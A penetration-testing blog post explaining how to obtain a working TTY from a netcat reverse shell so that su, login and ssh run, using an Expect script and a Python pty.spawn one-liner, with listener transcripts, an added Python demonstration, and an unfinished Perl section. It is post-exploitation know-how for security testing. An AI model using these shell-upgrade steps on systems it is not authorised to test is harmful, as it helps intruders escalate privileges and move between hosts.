This is a follow-up to a topic I touched on briefly before when I talked about the problem of trying to use the SSH client when you don’t have a TTY. I was recently in a position where I got an interactive shell on a box, discovered the root password but was unable to get root because I couldn’t run “login” or “su”. Both of these required a TTY in order to work. I don’t present a definitive solution to this problem (if you have one please send it in!). However, I discuss a couple of approaches to getting a TTY…

Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.

Using “Expect” To Get A TTY

If you’re lucky enough to have the Expect language installed, just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

    $ cat sh.exp
    #!/usr/bin/expect
    # Spawn a shell, then allow the user to interact with it.
    # The new shell will have a good enough TTY to run tools like ssh, su and login
    spawn sh
    interact

The following output, taken from a reverse shell, demonstrates how “su” doesn’t work until we use the Expect script:

    $ nc -v -n -l -p 1234
    listening on [any] 1234 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257
    sh: no job control in this shell
    sh-3.2$ su -
    su: must be run from a terminal
    sh-3.2$ expect sh.exp
    spawn sh
    sh-3.2$ su -
    Password:  mypassword
    localhost ~ #

Likewise, the ssh client doesn’t seem to work properly (with or without the -T option):

    $ nc -v -n -l -p 1234
    listening on [any] 1234 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33250
    sh: no job control in this shell
    sh-3.2$ ssh localhost
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    <big pause>

    $ nc -v -n -l -p 1234
    listening on [any] 1234 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33252
    sh: no job control in this shell
    sh-3.2$ ssh -T localhost
    <big pause>

After we run sh.exp we are able to use the ssh client as normal:

    $ nc -v -n -l -p 1234
    listening on [any] 1234 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43498
    sh: no job control in this shell
    sh-3.2$ expect sh.exp
    spawn sh
    sh-3.2$ ssh localhost
    ssh localhost
    Password: mypassword
    Last login: Wed Jan 16 13:43:20 2008 from 127.0.0.1
    user@localhost ~ $

Using Python To Get A TTY

This is quite an elegant solution I found on Tero’s glob. It should be effective against Gentoo systems at least, because Gentoo’s package management runs on Python.

    $ nc -v -n -l -p 1234
    listening on [any] 1234 ...
    sh: no job control in this shell
    sh-3.2$ su -
    su: must be run from a terminal
    sh-3.2$ python -c 'import pty; pty.spawn("/bin/sh")'
    sh-3.2$ su -
    su -
    Password:
    localhost ~ #
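To show why “su” refuses in the first transcript and why pty.spawn() changes that, here is an added example (my code, not from the original post or from Tero’s): the same probe is run once over a pipe, the way a netcat shell runs commands, and once under a pseudo-terminal allocated with pty.fork(), the mechanism pty.spawn() relies on. The probe command and both helper names are constructed for this demonstration.

```python
import os
import pty
import subprocess
import sys

# Constructed probe child: it reports whether its own stdin is a terminal,
# which is the same test su, login and ssh apply before they will proceed.
PROBE = [
    sys.executable, "-c",
    "import os, sys; sys.stdout.write('tty' if os.isatty(0) else 'notty')",
]


def probe_via_pipe() -> str:
    """Run the probe the way a netcat reverse shell runs commands:
    stdin and stdout are a socket or pipe, so no TTY is present."""
    result = subprocess.run(PROBE, stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, check=True)
    return result.stdout.decode().strip()


def probe_via_pty() -> str:
    """Run the probe under a pseudo-terminal, which is what
    pty.spawn("/bin/sh") in the post does for the spawned shell."""
    pid, master_fd = pty.fork()
    if pid == 0:
        # Child: stdin/stdout/stderr are now the slave side of the pty.
        try:
            os.execv(PROBE[0], PROBE)
        finally:
            os._exit(1)  # never fall back into the parent's code path
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 1024)
        except OSError:
            break  # Linux returns EIO once the child has closed the slave
        if not data:
            break
        chunks.append(data)
    os.close(master_fd)
    os.waitpid(pid, 0)
    return b"".join(chunks).decode().strip()


if __name__ == "__main__":
    print("via pipe:", probe_via_pipe())   # notty
    print("via pty: ", probe_via_pty())    # tty
```

The pipe case is exactly the state a reverse shell leaves you in; the pty case is what both sh.exp and the python one-liner give the spawned shell.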
Using PERL To Get A TTY

This is not such a great solution as IO::Pty isn’t installed by default on any system I’ve seen. For completeness, though:

<hmmm… can’t get it working. Will post later.>